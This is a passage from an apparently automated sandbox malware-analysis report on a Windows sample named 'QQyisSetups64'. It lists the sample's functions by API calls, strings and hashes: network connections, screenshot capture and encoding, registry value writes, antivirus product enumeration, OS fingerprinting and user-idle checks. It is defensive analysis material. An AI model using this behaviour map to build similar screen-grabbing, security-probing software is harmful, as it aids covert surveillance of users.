., xrefs: 02C8563A
l, xrefs: 02C85644
_, xrefs: 02C8564E
!jWW, xrefs: 02C85630

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
API String ID: 354323817-737951744
Opcode ID: 0dd16d61dfe9bf9fd70d2334807e68faaaf624232f6a1342340d081460334d1d
Instruction ID: 62933fded8fae5cabb0249ac52b4fbe6463fda049dae73a3f51cf1af67b094ec
Opcode Fuzzy Hash: 0dd16d61dfe9bf9fd70d2334807e68faaaf624232f6a1342340d081460334d1d
Instruction Fuzzy Hash: 0891B6B5A40204BBEB20EF60DC48FAA77BEEB85744F508559F9099B240D7B59E40CFA1

Function 03789E50 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 314
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03789E7B
GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03789EFC
GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03789F24
GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03789F7F
_malloc.LIBCMT ref: 03789FC0

Part of subcall function 0378F673: __FF_MSGBANNER.LIBCMT ref: 0378F68C
Part of subcall function 0378F673: __NMSG_WRITE.LIBCMT ref: 0378F693
Part of subcall function 0378F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 0378F6B8

_free.LIBCMT ref: 0378A000
GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 0378A028
SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 0378A0B7
GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 0378A112
_free.LIBCMT ref: 0378A134
_memcpy_s.LIBCMT ref: 0378A183
GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 0378A1D0
GdipCreateBitmapFromScan0.GDIPLUS(?,?,037A5A78,00022009,?,00000000,?,00000000), ref: 0378A22C
GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 0378A24C
GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 0378A267
GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 0378A274
GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 0378A27B
_free.LIBCMT ref: 0378A296

Strings

&, xrefs: 03789EE1

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
String ID: &
API String ID: 640422297-3042966939
Opcode ID: ce5ccca8801dc134247588db63b14c834bcfadaf5988a46bd6e2949a3cc5a16d
Instruction ID: 1ff9384a729c7546cd53dc5950459aa04982dc356c1f6b33502bafcfe94f7c1b
Opcode Fuzzy Hash: ce5ccca8801dc134247588db63b14c834bcfadaf5988a46bd6e2949a3cc5a16d
Instruction Fuzzy Hash: A6D183F1A40619DFDB64EF55CC84BAAB3B4EF88304F0485ADE709A7201D774A985CF64

Function 03782DA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203
networkstringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResetEvent.KERNEL32(?), ref: 03782DBB
InterlockedExchange.KERNEL32(?,00000000), ref: 03782DC7
timeGetTime.WINMM ref: 03782DCD
socket.WS2_32(00000002,00000001,00000006), ref: 03782DFA
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03782E26
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03782E32
lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03782E51
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03782E5D
gethostbyname.WS2_32(00000000), ref: 03782E6B
htons.WS2_32(?), ref: 03782E8D
connect.WS2_32(?,?,00000010), ref: 03782EAB

Strings

0u, xrefs: 03782F1C

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
String ID: 0u
API String ID: 640718063-3203441087
Opcode ID: 07a7e0404cb50acee399c4baa44b1ffc20edd592831b00d5c85b5fe75497ec42
Instruction ID: 6853a56888d95dce387b3e3687356df6ba96d985ab994e9b5b10d1af7aaf9b6d
Opcode Fuzzy Hash: 07a7e0404cb50acee399c4baa44b1ffc20edd592831b00d5c85b5fe75497ec42
Instruction Fuzzy Hash: B06171B1A40704AFE720EFA4DC45FAAB7B8FF4DB10F104519F655AB2C1D7B4A9048B64

Function 02C82D80 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203
networkstringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResetEvent.KERNEL32(?), ref: 02C82D9B
InterlockedExchange.KERNEL32(?,00000000), ref: 02C82DA7
timeGetTime.WINMM ref: 02C82DAD
socket.WS2_32(00000002,00000001,00000006), ref: 02C82DDA
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02C82E06
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02C82E12
lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02C82E31
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02C82E3D
gethostbyname.WS2_32(00000000), ref: 02C82E4B
htons.WS2_32(?), ref: 02C82E6D
connect.WS2_32(?,?,00000010), ref: 02C82E8B

Strings

0u, xrefs: 02C82EFC

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
String ID: 0u
API String ID: 640718063-3203441087
Opcode ID: 467c31de7e34738be6ae7ff76c90bf6276b199086856c1dcd4925853208b2d3f
Instruction ID: 7ba63fb561188584cd85655fa1ccbe3a93ccccde89d17505fc65272fe0c0be14
Opcode Fuzzy Hash: 467c31de7e34738be6ae7ff76c90bf6276b199086856c1dcd4925853208b2d3f
Instruction Fuzzy Hash: 0A6175B1A40304AFE720EFA4DC45FAAB7B9FF48714F104619F646A72C0D7B0A904CB65

Function 0378AD10 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 346
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0378AD53
RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0378AD73

Strings

IpDatespecial, xrefs: 0378AD6D
%s_bin, xrefs: 0378AE33
Console, xrefs: 0378AD39
Console\0, xrefs: 0378B0DC

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: OpenQueryValue
String ID: %s_bin$Console$Console\0$IpDatespecial
API String ID: 4153817207-1338088003
Opcode ID: c2b8e53b4c2ee1ac929c943e349e55b5919fe3605886ed41a34efb9c0f95e2f0
Instruction ID: ff7d15ac16e8670d2b93d5e14b2eea563b8eb51b6ec93104f1a492e3f673ca9b
Opcode Fuzzy Hash: c2b8e53b4c2ee1ac929c943e349e55b5919fe3605886ed41a34efb9c0f95e2f0
Instruction Fuzzy Hash: 28C1F6B5A803009BE714FF24DC45F6BB3A8FF94714F084929F945AB282E775E904C7A2

Function 03785F40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 88
sleepstringsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03785F66
GetLastError.KERNEL32 ref: 03785F6E
Sleep.KERNEL32(000003E8), ref: 03785F85
CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03785F90
GetLastError.KERNEL32 ref: 03785F92
_memset.LIBCMT ref: 03785FB9
lstrlenW.KERNEL32(?), ref: 03785FC6
lstrcmpW.KERNEL32(?,037A5328), ref: 03785FED
Sleep.KERNEL32(000003E8), ref: 03785FF8
GetModuleHandleW.KERNEL32(00000000), ref: 03786005
GetConsoleWindow.KERNEL32 ref: 0378600F

Strings

key, xrefs: 03785FD2
2024.12. 3, xrefs: 03785F5D, 03785F87
open, xrefs: 03785FCD

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
String ID: 2024.12. 3$key$open
API String ID: 2922109467-4129338558
Opcode ID: 353eff828b095c49459c8ff7c52dc910c54e2bf3a13c7a4bc2766a369d704df4
Instruction ID: 12ea47d43df0230540d1de156b883196d9e368a5b36ad9f7a4b680f384a97cc9
Opcode Fuzzy Hash: 353eff828b095c49459c8ff7c52dc910c54e2bf3a13c7a4bc2766a369d704df4
Instruction Fuzzy Hash: EF210572A84709EBE610FB64EC45F5EB398ABC4614F144929E6049B1C1EBB4E508CBA3

Function 037862B6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 125
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 037862CE
wsprintfW.USER32 ref: 03786336
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0378635F
_memset.LIBCMT ref: 03786376
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 037863B2
lstrcatW.KERNEL32(037B1F10,?), ref: 037863CE
lstrcatW.KERNEL32(037B1F10,037A535C), ref: 037863DA
RegCloseKey.ADVAPI32(00000000), ref: 037863E3
lstrlenW.KERNEL32(037B1F10,?,453DC9E3,00000AD4,00000000,75A373E0), ref: 03786427
lstrcatW.KERNEL32(037B1F10,037A53D4,?,453DC9E3,00000AD4,00000000,75A373E0), ref: 0378643B

Strings

Windows Defender IOfficeAntiVirus implementation , xrefs: 037863C9, 037863D5, 03786422, 03786436, 0378645A
CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}, xrefs: 03786330

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
API String ID: 1671694837-1583895642
Opcode ID: 18c0d90babd96d3d11cdaf23b0ab57d2794e900f555653dab8db8f37f9060185
Instruction ID: 94fe0f348262831c1d55187217da09a7768e5eaafc46ec2d6c5aa4248162bf1e
Opcode Fuzzy Hash: 18c0d90babd96d3d11cdaf23b0ab57d2794e900f555653dab8db8f37f9060185
Instruction Fuzzy Hash: 0641A2F1A40628AEDB24DB54CC55FEEB7B8AB88704F0441C9F359A7182D6749B80CF64

Function 03787490 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 99
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(ntdll.dll,75A373E0,?,?,?,03785611,0000035E,000002FA), ref: 0378749C
GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 037874B2
swprintf.LIBCMT ref: 037874EF

Part of subcall function 03787410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03787523), ref: 0378743D
Part of subcall function 03787410: GetProcAddress.KERNEL32(00000000), ref: 03787444
Part of subcall function 03787410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03787523), ref: 03787452

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03787547
RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03787563
RegCloseKey.KERNEL32(000002FA), ref: 03787586
FreeLibrary.KERNEL32(00000000,?,?,?,03785611,0000035E,000002FA), ref: 03787598

Strings

RtlGetNtVersionNumbers, xrefs: 037874AC
%d.%d.%d, xrefs: 037874E7
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0378753D
ntdll.dll, xrefs: 03787497
ProductName, xrefs: 0378755D

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
API String ID: 2158625971-3190923360
Opcode ID: b48c4f1f3bd7d8e952990a4a5e91a8de784298b9624c13177f42a4027beafe3a
Instruction ID: 797083a7a483f5b967e13abe2a45c8652dacf546ad1939ae34eb44b42474f360
Opcode Fuzzy Hash: b48c4f1f3bd7d8e952990a4a5e91a8de784298b9624c13177f42a4027beafe3a
Instruction Fuzzy Hash: EE31B6B5A41308BFD718EBA4DC45FAF7BBDDB88710F144519FA06A6146E674DB00C760

Function 0378C060 Relevance: 19.7, APIs: 13, Instructions: 179
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000002,?,453DC9E3,?,00000000,?), ref: 0378C09E
GlobalLock.KERNEL32(00000000), ref: 0378C0AA
GlobalUnlock.KERNEL32(00000000), ref: 0378C0BF
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0378C0D5
EnterCriticalSection.KERNEL32(037AFB64), ref: 0378C113
LeaveCriticalSection.KERNEL32(037AFB64), ref: 0378C124

Part of subcall function 03789DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03789E04
Part of subcall function 03789DE0: GdipDisposeImage.GDIPLUS(?), ref: 03789E18

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0378C14C

Part of subcall function 0378A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0378A48D
Part of subcall function 0378A460: _free.LIBCMT ref: 0378A503

GetHGlobalFromStream.OLE32(?,?), ref: 0378C16D
GlobalLock.KERNEL32(?), ref: 0378C177
GlobalFree.KERNEL32(00000000), ref: 0378C18F

Part of subcall function 03789BA0: DeleteObject.GDI32(?), ref: 03789BD2
Part of subcall function 03789BA0: EnterCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789BE3
Part of subcall function 03789BA0: EnterCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789BF8
Part of subcall function 03789BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03789B7B), ref: 03789C04
Part of subcall function 03789BA0: LeaveCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789C15
Part of subcall function 03789BA0: LeaveCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789C1C

GlobalSize.KERNEL32(00000000), ref: 0378C1A5
GlobalUnlock.KERNEL32(?), ref: 0378C221
GlobalFree.KERNEL32(00000000), ref: 0378C249

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
String ID:
API String ID: 1483550337-0
Opcode ID: 9ad6acdbed4ab88e26395905db071c0c243baff20fdb84a79b53f85aedb4761b
Instruction ID: 6979c1979be12e7b0112630247563e77b57dd232c90f5b0262b0bb3dfd2f2640
Opcode Fuzzy Hash: 9ad6acdbed4ab88e26395905db071c0c243baff20fdb84a79b53f85aedb4761b
Instruction Fuzzy Hash: 86614CB5D00619EFDB14EFE9D88899EFBB8FF89710F10852AE915A7241DB349901CF60

Function 03786490 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 144
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 037864C2
RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 037864E2
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 03786524
_memset.LIBCMT ref: 03786560
_memset.LIBCMT ref: 0378658E
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75A373E0), ref: 037865BA
lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75A373E0), ref: 037865C3
lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75A373E0), ref: 037865D5
RegCloseKey.ADVAPI32(?,00000000,00000AD4,75A373E0), ref: 03786625
lstrlenW.KERNEL32(?), ref: 03786635

Strings

Software\Tencent\Plugin\VAS, xrefs: 037864D8

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
String ID: Software\Tencent\Plugin\VAS
API String ID: 2921034913-3343197220
Opcode ID: aaa759d307dbe3ccf7b7f3443c10933e6ce6afff2c16e428c13a18fc70d2f0de
Instruction ID: 2456152c45e87d378a5958380753ffe5d1d479819484b0bf045321eeb25cef8f
Opcode Fuzzy Hash: aaa759d307dbe3ccf7b7f3443c10933e6ce6afff2c16e428c13a18fc70d2f0de
Instruction Fuzzy Hash: 2B41BCF5A40318BBDB24EB54DD85FEAB37DDB84700F0085D9E709B7181EA70AA858F64

Function 0378A460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150windowCOMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0378A48D
_malloc.LIBCMT ref: 0378A4D1
_free.LIBCMT ref: 0378A503
GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 0378A522
GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 0378A594
GdipDisposeImage.GDIPLUS(00000000), ref: 0378A59F
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0378A5C5
GdipDisposeImage.GDIPLUS(00000000), ref: 0378A5DD

Strings

&, xrefs: 0378A579

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
String ID: &
API String ID: 2794124522-3042966939
Opcode ID: 5da9f209c01b93e4f737e5057b7b203c137a000ace2f99432ee3c096c262e23d
Instruction ID: 4939b92775869881a5e19ab78c814d8f9007e00e1578a351f8511969797053c7
Opcode Fuzzy Hash: 5da9f209c01b93e4f737e5057b7b203c137a000ace2f99432ee3c096c262e23d
Instruction Fuzzy Hash: 285184B5E402199FDF44FFA4D848EEEB7B8EF48310F04851AE906AB250D734A945CBE1

Function 02C852B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123registrysleepCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02C85382
RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02C85392
RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02C9C6E0,000012A0), ref: 02C853B0
RegCloseKey.KERNEL32(?), ref: 02C853BB
OpenProcess.KERNEL32(00000400,00000000,?), ref: 02C8540F
GetExitCodeProcess.KERNEL32(00000000,?), ref: 02C8541B
Sleep.KERNEL32(00000BB8), ref: 02C85434

Strings

SOFTWARE, xrefs: 02C85378
IpDates_info, xrefs: 02C8538C, 02C853AA

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: OpenProcessValue$CloseCodeDeleteExitSleep
String ID: IpDates_info$SOFTWARE
API String ID: 864241144-2243437601
Opcode ID: 751d9e1d5f7fd4643ae10ac2e0b6c422caca6ef648fb43e3a979a88608a2264b
Instruction ID: ce25dc1a8cdb7c0a9bd5d85c111ba764f18c1de7cfc04622578f670b43789a83
Opcode Fuzzy Hash: 751d9e1d5f7fd4643ae10ac2e0b6c422caca6ef648fb43e3a979a88608a2264b
Instruction Fuzzy Hash: A64179716842409FD310AB349C0DF7B7BA5EB9538CFCE8548E18987182C3F0DA06C392

Function 02C852D9 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84registrysleepCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02C85382
RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02C85392
RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02C9C6E0,000012A0), ref: 02C853B0
RegCloseKey.KERNEL32(?), ref: 02C853BB
OpenProcess.KERNEL32(00000400,00000000,?), ref: 02C8540F
GetExitCodeProcess.KERNEL32(00000000,?), ref: 02C8541B
Sleep.KERNEL32(00000BB8), ref: 02C85434

Strings

SOFTWARE, xrefs: 02C85378
IpDates_info, xrefs: 02C8538C, 02C853AA

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: OpenProcessValue$CloseCodeDeleteExitSleep
String ID: IpDates_info$SOFTWARE
API String ID: 864241144-2243437601
Opcode ID: eb510a359f8a87cccbc43beb90612fab4aeb09eb87adde65495a7a731d51cbb7
Instruction ID: 572573868bd2d7818bf057390305416838e086d4b1b8181611741247edc3e416
Opcode Fuzzy Hash: eb510a359f8a87cccbc43beb90612fab4aeb09eb87adde65495a7a731d51cbb7
Instruction Fuzzy Hash: 8031D7706853819FD711EB30880DF7A7BA5AB8538CFDE9848E6899B142C3F0DA16C791

Function 0378CA70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,037A12F8,453DC9E3,00000001,00000000,00000000), ref: 0378CAB1
RegQueryInfoKeyW.ADVAPI32(037A12F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0378CAE0
_memset.LIBCMT ref: 0378CB44
_memset.LIBCMT ref: 0378CB53
RegEnumValueW.KERNEL32(037A12F8,?,00000000,?,00000000,?,00000000,?), ref: 0378CB72

Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721

Part of subcall function 0378F707: std::exception::exception.LIBCMT ref: 0378F756
Part of subcall function 0378F707: std::exception::exception.LIBCMT ref: 0378F770
Part of subcall function 0378F707: __CxxThrowException@8.LIBCMT ref: 0378F781

RegCloseKey.KERNEL32(037A12F8,?,?,?,?,?,?,?,?,?,?,?,00000000,037A12F8,000000FF), ref: 0378CC83

Strings

Console\0, xrefs: 0378CAA4

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
String ID: Console\0
API String ID: 1348767993-1253790388
Opcode ID: 7ff916adb2edd080c6ff0ad6dd16e81a10b5d8a9d98b64f7e23c674d7a423133
Instruction ID: 1eaab899cde1b64101b3b36230ec0d6c44dd13784f44ee8124b04f6077c57294
Opcode Fuzzy Hash: 7ff916adb2edd080c6ff0ad6dd16e81a10b5d8a9d98b64f7e23c674d7a423133
Instruction Fuzzy Hash: 7D611DB5E40219AFDB04DFA8DC84EAEB7B8FF49310F14466AE915EB345D7349901CBA0

Function 0378BB00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721

_memset.LIBCMT ref: 0378BB21
GetLastInputInfo.USER32(?), ref: 0378BB37
GetTickCount.KERNEL32 ref: 0378BB3D
wsprintfW.USER32 ref: 0378BB66
GetForegroundWindow.USER32 ref: 0378BB6F
